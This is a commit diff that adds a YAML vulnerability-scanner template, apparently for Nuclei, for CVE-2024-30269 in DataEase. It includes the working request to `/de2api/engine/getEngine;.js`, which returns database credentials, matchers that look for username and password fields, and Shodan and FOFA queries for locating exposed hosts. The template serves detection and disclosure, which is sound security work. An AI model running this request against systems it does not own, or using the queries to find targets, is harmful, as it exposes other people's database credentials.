add CVE-2024-30269
parent
59b48525c0
commit
a95e83b154
|
@ -0,0 +1,42 @@
|
||||||
|
id: CVE-2024-30269
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: DataEase <= 2.4.1 - Sensitive Information Exposure
|
||||||
|
author: s4e-io
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the `/de2api/engine/getEngine;.js` path via a browser reveals that the platform's database configuration is returned.
|
||||||
|
remediation: The vulnerability has been fixed in v2.5.0
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-30269
|
||||||
|
- https://github.com/dataease/dataease/security/advisories/GHSA-8gvx-4qvj-6vv5
|
||||||
|
- https://github.com/dataease/dataease
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cve-id: CVE-2024-30269
|
||||||
|
cwe-id: CWE-200
|
||||||
|
epss-score: 0.00043
|
||||||
|
epss-percentile: 0.09595
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
vendor: dataease
|
||||||
|
product: dataease
|
||||||
|
fofa-query: body="dataease"
|
||||||
|
shodan-query: http.html:"dataease"
|
||||||
|
tags: cve,cve2024,dataease,info-leak
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /de2api/engine/getEngine;.js HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains_all(body,"username", "password", "port")'
|
||||||
|
- 'contains(content_type,"application/json")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
Loading…
Reference in New Issue